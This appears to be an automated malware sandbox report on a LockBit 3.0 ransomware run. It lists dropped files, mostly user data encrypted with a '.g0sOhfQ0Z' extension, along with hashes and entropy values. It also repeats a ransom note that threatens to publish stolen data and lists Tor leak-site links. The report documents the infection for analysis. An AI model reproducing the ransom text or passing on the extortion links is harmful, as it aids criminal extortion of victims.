                SSDEEP:6144:oLKhRq6iZT3RxnuUWBNpcHNr3ZSSfs9LK2yYf:KKXq6ihbn/W6p300YLK2/
                MD5:0227AEB64E38CCA556387A99AC4919BD
                SHA1:4404BA950AB0B855A6D18862A1C97DC88D0AC034
                SHA-256:24DBAE652EFDCC5A4131345484F6B52C8FCBEAB893CF28CAB799B784CE70F420
                SHA-512:F769C622C5C2250BB78A4F7422DE86680EF1B03E84ABE05AED4CAB1D45225045920B3A333B58DF046F9DF25CE3EDE324BC17CAB6EDCC084E55E164C1337063FF
                Malicious:true
                Preview:q=.....6.a..,t..H...cn.W`.s.WI./b.C.jO.4%`|.Nx.J..(.o-.*`\).c...9|=..9~4..M......D\..^a..y|....H...6..p....`.Kv.L....ke..O.j.kj<...?a.=.c`Lq@..l...N.q.wb.r...l8.:c..Ew.m4...K....iE_iP....]..B;..J..W.>f.L.....@-f... :.r.E<.....!.g|.t.Z"L..:..e..MV/.c\..`.:\K....Q....|..P..)4......H...%...~.$W}.*b...!.......U.mL......."*.X..-...b./,.5Gy.Np8c4...{..:...O..^4..4......q.`8l.'4V.....2.M.....Q..0.HG.y....._..?..e.X...(....w~-...h.......N.....o.k6P.h..nv. .Q0...v....^.....L..*....t..:G.5...$..L.d..b.>.o..|..B.n.S..p......r.z.._~0...J...d..GX{d7Bl..57....0L.B....Q..)..ikA.|8......Ta...'.U.#./$..{[......L..]G..".z....U.p/..so 8...fs.C...z.......I.....P'n)rD..$.{Q.(!...c...Z.Q.j...V.KJd...!..{.......(.p..w.ZX.0z5.U.z'.K+......V.t....gFj.QUm.o.[..H......uN..l.J..M.EW.$.B.C... 2).x5....I'xK.!.Z7.......uB.......;.j..w..ybJy.....E..Q.B.h..|n.a"..!>{..u...).....7Q.S}2..m....N.T..k...N...7W.2.$....c.hy....\R...PY.2..~'..S.P....[...

                C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):12533
                Entropy (8bit):7.984330379573219
                Encrypted:false
                SSDEEP:192:IvNieXcq0Jw/+RFi6SomEftTs+OJzKIJ0teODl+2PW6Iqe2QCwYr6o:GXcqN/+1zftYbVKypOR+B6A2wY/
                MD5:9C5109CA7DA26141515A469604AC42B3
                SHA1:1191DDACFA3F8CF0C01403675F43D2124404FB6B
                SHA-256:5E1409E608E2B9840E9F0965D94907A51E64BDB0F8B2AD9015C6FA8CA6F9432B
                SHA-512:DDA3317EE7637AC0C04DA1AF62B2866E9357E53B5400EFECB11341216D33A6A699062CF083D98035B5C75087DD36149D4ECBE41218CB4654B30F3F872D618410
                Malicious:false
                Preview:...q._u..m.I~.Gn.*3...$V...m.t"...+..<.........?...moT..5..p.......g|....U.s..G..<......e.yc....y..H.(.z.{4..+.........x..xQ@0..WgA&.x?.`Q..MO....*.V..x)'.g.7..7........*j~.K...Z.1.~.........O/...._.=>X..*.i.A?......s..Nz}....<T....E+g..hM..i4.-?>D.!`2/.R..y......6s.(....[.v....`.C....Wb....!.K....1.H+ae.Q...%..2".....H&..W.aC..Y..<.(wQ.v..[....'6..v..l..._.cH...$SI..;5,..].@...*..;..m3.E4oE.p4.+...7..:.=_.).<.[...e...(I.s..z....O..i2.o,.W......F.0."r.........%m.<.M.....%..6_.,r.n..+J..`....L?.....7.p'....>.7i<.(...pG.........h.Q..~..F.?...-B...b.D7.&vH.......r.>..]{.pR.2..J.lO.[..1s.Jf...H.w;..u-..BG....p.!np.nz=/..q.....}0.'>j..q{..3My..F.v..1 ..f.;..@.U:a..#9W.k.-o..r.hu.mi...U<d.$....G.&...98.^...3.t6.6......'..C.D$.:..k~.(lc..m)...T.SY.E.H&...V.j....2...je3....C.............a......y.O......q.}i............N.?..s.0=;.Sg...J+>..?G...9.LC... .Qa..iN...Q,.-2.,.H.$~...h..#..[.....v.O...=.d8V..6X(M..So..\....."F.8.,}.....D.....C...

                C:\Users\user\AppData\Local\Adobe\Acrobat\DC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Adobe\Acrobat\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Adobe\Color\ACECache11.lst.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):842
                Entropy (8bit):7.742407586885798
                Encrypted:false
                SSDEEP:12:vn/Jrvzld18yggLbLY1IrIV7bTqil4r6lW/P7zK8xc7GkQieVlAyiKeVtXD2VJNh:vtnaVm8zW/PHpxcuKD2HNAX+i+9BVR
                MD5:6D2085F454A420248C60E75C4E3E3CE1
                SHA1:78C98C5959CB78EF4DFF675E73535E67C779A7FC
                SHA-256:30DA141CAF57D1029CEFC8376E0C141E4466D1F214F78872EBFE04C32E61ED46
                SHA-512:FA93733AAC7C3B0EDA13A0A921227C3FEA878E0B58E0E0A2AF7B937ABEE7778CFCE53F2A73C4A59B7C2BF10EFC5E2377D4FEF0584D700504DA8375B653B2E8EE
                Malicious:false
                Preview:...aC+%..1.?"..A.]...8%...U.Cq...nH;.....@#~Gw.5+Ak.d?.+...(`....K.S./..V.X.t7.Kg>(.u.P...)K..1.vk...gD..A.N..+q....:w......3......`*<.Va...M.V...._E...U...I...Z..J.GQ.~.K.]jD^k_bbB.o........L>.#.~..~.PL:X..99.%.V.h3?A".V...FEe{....e..4..?...qD..}..G1...z..w`..F.N:1Yn..S..(.!...R...-.v.Up...K.H..T.l..~!c..})F..s...oT....f. ......y.{;.lVu.r... .s.e.......{^.$...:...9..........g..........MA......glrb..%....[.D?..VW._.W`.2..ObPr?...^.........2s..*.)i...rF.h,S...]zV3....H.......m2..99.....*....GKs..9.b>...V.n.7...m;...5....7.}..u<.*5..`.u2tg...x.g.3.H-.;....pT)t.._....^..U..P,.#....q..{.......i..G...<..3....@.h...f.. j...Z.c.j...g.vt.XM`V.... ..JL.)u...k.!-....)..m.3Z..7.!n..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\Local\Adobe\Color\Profiles\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Adobe\Color\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Adobe\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jcp.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8424
                Entropy (8bit):7.9782941901541085
                Encrypted:false
                SSDEEP:192:4vJTU0hjMkAvVBKobVkVp1VBS0KL5rWrebOcg4VXFHyo:4h7BStbudS95rnB
                MD5:09B746E1E09024BDED3345D89D898B6F
                SHA1:792D0717B8C53831005F239B3ADAE5481B2F3AF3
                SHA-256:DA16C02108246BB58E69150E1AC0EFF875151F342D1A55A79BA4AA78805C2065
                SHA-512:BE80F35AEC0876456402FFB24C0BC3D16C96F4DF5C138E8DEC9C4333367EB03D83C5C0AD096793E24F9CA6F5251F56D823CE18CA4E15C8C6895F5835861053E9
                Malicious:false
                Preview:G.oD.T....%.....y.N....z...N..|."~,/>k.i...`..W&?.e......=..4...Sb.2.)yE%...Fk-xp.T.L'.....<.J,....k......_d.p...u.....l........w@.mvy...B...5..r7.Z...../.........K.mko...p....A.......w.R:Q...9.vc..G....&.^n.....L. ....yDn....[M....(....z_. ..x4.....YQ.c.......L.^.K....e.J..H..>......lU.i.f..g........(..LI..$.k7....|r...+t~..g.3......O..\...qE6..sB.c.#...._..=.Xn.h...4(b........=;....e..NF.D....\...`... K<..E.vgR..?c.K<B...h!EG<!..F..L^.....x.*.4x..^.BS?j.7. +.?..j.w.]n1..=..O..;...T..r..aD{.2...".....f..f..Mz...`V.j8.G..= TK,l./...w..'R.s..U(.1.96_.r9...}z1..5......s.tPz%....w...j..<#..(..c...BO..W2...#.[=.....(.q...6_.r.P....s...7IY.QS.....y.Q.l.[....&KB..(3O.g..X .\R..-9...o.....iW.I-....@m..K..Oo.....mz.u"..j..&-5..hl...F.E.K....P^...J.K.6..n@..]N...(....`.gG.ZF......`.n'.?......O...l..=..6....6Y..f.q?m.i.>.Yc.~.bl..yO`..=...:.....,..`B=...P.c'-B..O...V.9.!E6D.^.I.. ...}..D........b....1..vm.^.=..(`j...(k.dV.....:...f.9C...x.+.

                C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jtx.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):3145960
                Entropy (8bit):2.4743312787275764
                Encrypted:false
                SSDEEP:12288:kfkYTcof3S1cyGyulbyP31Fqlahe7vzhGPmfUJdNIrNPwMB6Ux7nz:oTco6WyPF8lagTkmfi2SMgUx7nz
                MD5:94EA316492AA0DB82CA22A205C40936B
                SHA1:84406C965B5D53866EEC4E5661285BDC2252395D
                SHA-256:1D8DB00FA56056367088A7C3885C3AAB4E13A644C78A51523D315BE82D297763
                SHA-512:ADE2A30A5D910FF46F43ACEBC59DDE3384B6B6EBCC06B5538B315F9EAEB37AB548421F9D1F3EACE06317D4EA76AD0DB3BB075D9FBCED9E7543B54A404B53E3E7
                Malicious:false
                Preview:.."^d.8.}7....o#.=.c../....j.__.7.o0.E.*C{....eN/._'..4.Z4l9.o.....*5*.%v.%...h...r..q.81O..)0.`.P.............+5....C..C0.c]yg`..ac...<.JW.:...........{(.....?..[...o.5{?9U.B...'.....Mn$. .Ht;g......zM..L.I_......:]Q%0........l...XG.G..|.uhS..j..l..L.?.L[o..b..'#.|^.Gf...n.......M....5t9j.D*.$...n.".<.EC......)...#O!AGH!j.D...&Cvb...)..g...j>..ly...lX.H.`..z....x..<........q($.DjfmX5.H._..n..6..|.4G.+P[6.....kF.I...>PST.F.L.d.V..;.<.\|......b ...m.K.6.B.\GX..%=/.v!.|.!.d....Z....FU.@{.....N...,=..o...-x...=.~.:.r.}..a."...a..?;j...[}....aeV....Fi.%.g].~..."...O......'x..>g.0..iS..\..}..D.......3.)v6GJ........-q}...xG.E..9^..$~...E..(%lIr...7......H]..*>F.6..Z.@.L.....E.:k%GO...b.I...B.aV.O...e...E.<".fy. 0..|....!5....B.....k...9.:_@....dDk....+....#..s.yW[=al...f;........n...Vy..."..WiW..X.).....?n....u.">....l.;0.3.....D.}.m.c']..@.DmB.):......"..(..K......U....K.3.vF.(....6......&...D.........?"..N...Z..8T....5....7.*..R..4l

                C:\Users\user\AppData\Local\Comms\UnistoreDB\USSres00001.jrs.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):3145968
                Entropy (8bit):1.976208849374269
                Encrypted:false
                SSDEEP:12288:67uMKAXa19mJ7+WQ7wwZmygzLgmkzJjBmgJAVG4/o9/Gh+o:su/AqLSnVJzLAJd5cG4/Ei+o
                MD5:4EBB4584DAF2A9AF1F8585BFFF5A4797
                SHA1:4E483198C3182CB8B391BFC2E87A00FDDBA3BC6A
                SHA-256:53325917BF0CF27175D622D62CEA4ADDADBFBBD8C27E937933AF0913F73302A8
                SHA-512:F6CB1C99F9E51F3440FF03C66E4FB726BB915661EE505A92C54B278E783EA009D7F152688FDE7DF6D323D2A3BF78C545C4CBA4B0FFD5A396753B6A0FA5F07D29
                Malicious:false
                Preview:xr.)..>...o..2........{oA....@..@..D ..[..L.{D..qL......+..i7...a..;...E.u..C.P*pU.W.>jh..m=(:.T.V.B.!j..........z..6zdb..]*W..U...o(.......W....f.Td#..e..n2..0w..t.~.%..I?Xo..B.....C.ST..t./i....5...ov....<h..dk5.#,P...U.W5T...<...C..\H...D....P.....2..n/....?^!4...?85o..Qs.1h5M...2&...2+x...}.#..V.:hg..q...<._"T.0..Qf..?W..+..o..a.l.K...G.Q.,J4. +..R..{Oi..Q..6.E..2N..Pe....a.].. |....<....+.'.=#..4(c.V.p......=.&g.Z....&....%s.}.;.vSk....$......K.....X:.....q.F.]C..\.....N..>q.y....._.?V.c.".K.+~i[v....z.b.k...W.....).-.ON.w...M...2...jL....w4.u..*.'......E....v.m..},..a.ARAq...Z......T..r....JO.,db2.. B.......7F.......k..-O..:.3r...)..[\Ue.7.S...B..m./p.....,....w0.m~..L.....7..sz.......%a...&.K!.&..VR....R.X-h^..F.),...R#.<../+Ywj..~.rM..XV\....Ww.nT.I....q..X.../..1K...K."...W......)....W.))..`1.....g..n......D.*.qf.[.2...(?...B..*dLOp...>9?B;.L.{S...w.Hg,..e<.c6.K..u.<..E.z.i.'..-p...V..'i0..$...1xK%..Y|'. E..a#...B....@...#.80R.

                C:\Users\user\AppData\Local\Comms\UnistoreDB\USSres00002.jrs.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):3145968
                Entropy (8bit):1.9762560714581525
                Encrypted:false
                SSDEEP:12288:XXCc0QsXgFyIQ/Qynlo4yWyxRaR2apblgCWv9no8OMrxWddiR:XXCprgFYyxxRw2GWdoNS06R
                MD5:1DF85838B8A42C52465B6FE585ED8470
                SHA1:D90FB2865B8A66AEF0209E1456321E47056A9117
                SHA-256:4C8BAD86F431CEAF41FDD21E326DBD008980DD372D7F54DF201AC8524EA88D14
                SHA-512:AC69DDF766AC8E979AA0806F9BCB6E23584ED4618590809751CC7DC0519E63CF04DAAA3E5E969B4E6C9B8744C42B3D1ED1120207EB53433CA189E6DDA31CC7E0
                Malicious:false
                Preview:...t...?."o.o.2..+.~......1.2++.7de}....C......K..z..t...c$...J...N......L..8=.......?f. .XZ;.p-X..{p..;...}..6.R/.V.u.N.>.5m..r...-...WQ...Q..b.}z..=F........F.F=3.j.. ....".yJj..n..Hm...tMc..z....56.o.J...1K.B...s.m....%../-6...\....V..^t.....i.e...[...#.+.q..,t#.1.(.. ).G.#nE,..5-'........$....../..9.W..F.G..;......<..n..uY......Y>u.`._....a..V..T.hl..5...>r.?.Y.LC,.z7..P,i..V5.>...a..qj.x.PT.....T..{|4.R.-{wn.k........"......ywW..S....:.i.]nT;m..Vk...}....I...v3RZ.Y...#.R...D`K...8..].9LuP...(.&.>-.........Z%\...48.C.<iJ.....J..u.=.\.8..W.}..g.....T.....".9..K..Y[..4.J|&...NVR........v..w..f..&...)#.,..~<.*...6H"...0yV.a..".......x."9q%./..).I.<....{...wFJ....j,..8.f~9..x.....h..65..hG.:..T...q.rW]\Z......\...i.Nh......t.b.?ge7....M0.2ts?^!...z0E.7=.~....L.q7.0....y..lW..'1*N...VRb..!...c..*....,...(..G4.].z.N.X..H..U..N.).G.S.B*'.)..,H..>..p.3.d.$....UT..Z....E..(i{...4....).dv...:b|.... Q./U....Mh.y....._....(.....J..3.,...2.(.....1c..

                C:\Users\user\AppData\Local\Comms\UnistoreDB\USStmp.jtx.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):3145964
                Entropy (8bit):1.9762544577043213
                Encrypted:false
                SSDEEP:12288:jUz4gmyhjroN4zVO6hPQGnmn3x+esiL5e9QsvmTVmdIeo:jzr0q4zVjhPTEx+fiLM2seTVJf
                MD5:CB15BADAD0912F83DE9F9069E71A542B
                SHA1:8B38B3CA71E7BEA0434D4EAD41D9AFA947DC8389
                SHA-256:2E5CED55696750D1B477B79B376E94315DA682909B6DA49719C6EBBA29D85957
                SHA-512:8E447B98E897498BDC3225D3EA4F2A2C62030C99760390C310937B999C8144D6CFF834861E7C927C1C26CA573511230ABA4A35918176245A9AD39B58FAFF8066
                Malicious:false
                Preview:.%{L8...i.|.T.t.g.L.\..a...W....X...h...7..........F9.a..:....z.........-.....).2.....Q........fq.......q.....&p.=......Ts..+H..... .......o%.4.}$..z.....>_..c.WEH..K/.t=....f....s.m.. a....T...EF...R.F.-.&ZI@....7.<.5..i~...B.qj.....R....O...q` ..@t.b.6..........A......tgN-.\.<1.%.....Q......g..&Z'n($..i._....:Qu@l.Xd..........\A......].6.U..A...F.{.........|.-....y....jQ|<.$.A...d.u....".4.2J....Y].g.....>.8@Q.-..%...$'.....K...E...Vj.0...M....B.P...v.e....i....a...... t<.....IP.m.B.4vRl..9...WQ.........h...D.qL.D7....fy#..R...W.W..^[|.:^#......-EG....?..(.B...w:.K.G]b'...t!.a+3.M..7...Zd2...#..x.w..Sq..C..h..Q....;..?)(....;s.R..2..[/...`W..6n.k.YD.?.$.....!.^..R.j.2a...e....t9..K...AH..k..._...=..e........V.....E.)."r^<.?..n.q..6.1....9.Lh..i.o.....;;..&iz.....GW.e.i.....u....E..IB.Ap...>..H....f......_....<.ya6{.E.f..-....R.W.@..\.'.....\....,1..L.u..[......=o.j...sc..Iw.]...Q.....q..^.=...,.....B)`O.v.....U.../[.....k.b...T..+..C.

                C:\Users\user\AppData\Local\Comms\UnistoreDB\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Comms\UnistoreDB\store.jfm.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):16621
                Entropy (8bit):7.9885886218202655
                Encrypted:false
                SSDEEP:384:Ug62IazotxBC4rSq/I8Zw3fh1EhBvaGD0j:Ug62VzMxB15/u3fh1K5aGY
                MD5:299FB9CD844FEAD415E28222A7E94DE7
                SHA1:34FD7FA98A29258447E31FFB6C55B9282FC56D34
                SHA-256:14DC115A5808AA638BCC7298A186B783792446EF701761FB01C528CE7AF864B2
